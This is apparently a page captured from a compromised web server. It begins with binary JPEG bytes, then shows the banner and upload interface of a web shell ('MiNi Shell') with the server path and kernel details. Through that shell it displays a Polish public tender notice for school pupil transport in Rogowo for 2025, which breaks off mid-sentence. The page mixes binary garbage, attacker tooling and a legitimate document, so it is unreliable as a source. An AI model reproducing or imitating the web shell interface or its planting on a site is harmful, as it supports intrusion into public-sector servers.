JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241112/0058856101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług dowozu ( i odwozu ) uczniów do szkół podstawowych i oddziałów przedszkolnych w 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samorządowa Administracja Placówek Oświatowo-Kulturalnych w Rogowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001113835</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Powstańców Wielkopolskich 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rogowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sapok@rogowo.paluki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://sapok-rogowo.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administracja placówek oświatowo kulturalnych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług dowozu ( i odwozu ) uczniów do szkół podstawowych i oddziałów przedszkolnych w 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4ace65fb-5e7b-40a8-8463-921ab2cc42a8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00588561</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00077021/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług dowozu ( i odwozu ) uczniów do szkół podstawowych i oddziałów przedszkolnych w 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rogowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, ,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń , odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, składa się, pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym poprzez Platformę, dostępną pod adresem: https://platformazakupowa.pl/pn/rogowo.<br/> <br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują<br/> poprzez Platformę, dostępną pod adresem: https://platformazakupowa.pl/pn/rogowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający podaje wymagania<br/>techniczne związane z korzystaniem z Platformy 1) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux lub ich<br/>nowsze wersje, 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0, 4)<br/>włączona obsługa języka JavaScript,<br/>będzie komunikował się z wykonawcami, oraz informacje o wymag. techn.<br/>i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików. pdf.,<br/>6) Szyfrowanie na platforma zakupowa.pl odbywa się za pomocą protokołu TLS 1.3</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Kierownik SAPOK w Rogowie z siedzibą na Placu Powstańców Wlkp<br/>26, 88-<br/>420 Rogowo, email: sapok@rogowo.paluki.pl, tel: +48 52 3024150.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować e-mail: iod@admin.com.pl lub<br/>pisemnie<br/>na adres jednostki, podany powyżej.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym, znak: K.261.2.2024,<br/>świadczenie usług<br/>dowozu ( i odwozu ) uczniów do szkół podstawowych i oddziałów przedszkolnych w 2025 r.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w<br/>oparciu o a rt. 74 ustawy z dnia 11 września 2019r. – Prawo zamówień<br/>publicznych dalej „ustawa Pzp”<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym<br/>określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie<br/>do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art.<br/>18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">k.261.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług dowozu ( i odwozu ) uczniów do szkół podstawowych i oddziałów przedszkolnych w Rogowie i<br/>Gościeszynie oraz do szkół i ośrodków specjalnych w Żninie i Kłecku w okresie od 01.01.2025 r. do 31.12.2025 r.<br/>w dniach nauki szkolnej i zajęć przedszkolnych. Przewozy realizowane będą na podstawie imiennych szkolnych biletów<br/>miesięcznych, zakupowanych przez Zamawiającego u Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Maksymalny czas przebywania uczniów w pojeździe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym,<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów,<br/>c) sytuacji ekonomicznej lub finansowej,<br/>d) zdolności technicznej lub zawodowej.<br/>2.Wykonawca w celu spełnienia warunków określonych w pkt 1b i d musi:<br/>a) potwierdzić spełnianie warunku dotyczącego posiadania aktualnej licencji lub zezwolenia<br/>na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września<br/>2001 o transporcie drogowym (t.j. Dz. U z 2022, poz. 2201 ze zm.) (w przypadku wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia ww. warunek będzie spełniony,<br/>jeżeli co najmniej jeden z Wykonawców posiada wymagane uprawnienia i zrealizuje<br/>usługi do których te uprawnienia są wymagane),<br/>b)potwierdzić dysponowanie osobami min. 8 , które będą realizować zamówienie, posiadającymi uprawnienia do kierowania<br/>autobusami tj. prawo jazdy kategorii D oraz uprawnienia do przewozu osób,<br/>c) wykazać wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie co najmniej 2 usług polegających na przewozie dzieci do szkół lub przedszkoli o<br/>wartościach co najmniej 200000,00zł każda wraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) aktualne na dzień<br/>składania ofert oświadczenie z art. 125 ust. 1 ustawy pzp<br/>(Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia oświadczenie te składa<br/>każdy z nich oraz podmiot, na zasoby którego powołuje się Wykonawca w celu spełnienia<br/>warunków udziału w postępowaniu)<br/>2) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego<br/>do tej samej grupy kapitałowej. W przypadku wspólnego ubiegania się o zamówienie<br/>przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. Oświadczenie należy złożyć w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym – załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>aktualne na dzień składania ofert oświadczenie z art. 125 ust. 1 ustawy pzp<br/>(Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia oświadczenie te składa<br/>każdy z nich oraz podmiot, na zasoby którego powołuje się Wykonawca w celu spełnienia<br/>warunków udziału w postępowaniu).<br/>2) licencję lub zezwolenie na wykonywanie krajowego transportu drogowego osób zgodnie<br/>z ustawą z dnia 6 września 2001 o transporcie drogowych (t.j. Dz. U z 2022, poz. 2201 ze zm.)<br/>3) zobowiązania podmiotu trzeciego w przypadku określonym w pkt 5 -6 części VIII SWZ.<br/>4) pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych<br/>się o udzielenie zamówienia publicznego.<br/>2. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych, w celu dokonania<br/>kwalifikacji podmiotowej Wykonawcy.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1) licencję lub zezwolenie na wykonywanie krajowego transportu drogowego osób zgodnie<br/>z ustawą z dnia 6 września 2001 o transporcie drogowych (t.j. Dz. U z 2022, poz. 2201 ze zm.)<br/>2) wykaz osób – kierowców skierowanych przez wykonawcę do realizacji zamówienia publicznegoi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego,<br/>oraz informacją o podstawie do dysponowania tymi osobami.<br/>3) wykaz co najmniej 2 usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy to w tym okresie polegających na przewozie dzieci do szkół i przedszkoli o wartościach co<br/>najmniej 200000,00zł każda wraz z załączeniem dowodów, że zostały wykonane lub są wykonywane należycie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale<br/>X SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 6. Oświadczenia<br/>i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy:<br/>1) w przypadkach określonych w art. 455 ust. 1 pkt 2, 3 i 4 ustawy Prawo zamówień publicznych,<br/>2) Zamawiający zastrzega możliwość zmian godzin dowozów i odwozów,<br/>3) Zamawiający zastrzega możliwość zmiany ilości dowożonych uczniów,<br/>4) w przypadku zmiany przepisów dot. przewozów, zgodnie z regułami tam określonymi,<br/>5) w przypadkach zmiany przepisów obowiązujących dotyczących podatku od towarów i usług przy<br/>czym kwota netto pozostaje bez zmiany zaś kwota brutto zmieni się w zależności od obowiązującej<br/>stawki,<br/>6) w przypadku waloryzacji wynagrodzenia<br/>W okresie obowiązywania umowy wykaz planowanych miejscowości zamieszkania uczniów ( przystanków ), godzin dowozu<br/>oraz ilości dowożonych uczniów o których mowa w pkt. 2 mogą ulec zmianom. Ponadto wykaz ten może ulec zmianie co do<br/>godzin dowozu i odwozu uczniów w wyniku konieczności dokonania przez dyrektorów szkół zmiany rozkładu zajęć<br/>lekcyjnych itp. albo też zmiana ta będzie konieczna ze względu na ustalone lub w czasie trwania umowy zmieniane kursy na<br/>trasach przejazdowych przez Wykonawcę.<br/>Zmiany w zakresie godzin dowozu i odwozu wymagają akceptacji Zamawiającego i Wykonawcy.<br/>Zamawiający zapewnia sobie prawo do ustalenia różnych godzin dowozu i odwozu<br/>w poszczególnych dniach tygodnia.<br/>Strony umowy przewidują możliwość waloryzowania wynagrodzenia z zastrzeżeniem poniższych ustaleń:<br/>a) Wartość podatku od towarów i usług oraz podatku akcyzowego, z tytułu realizacji<br/>niniejszej umowy zostanie zapłacona zgodnie z obowiązującą w dacie powstania<br/>obowiązku podatkowego stawka VAT. W tym zakresie wynagrodzenie brutto<br/>podlega automatycznej waloryzacji bez konieczności wprowadzania 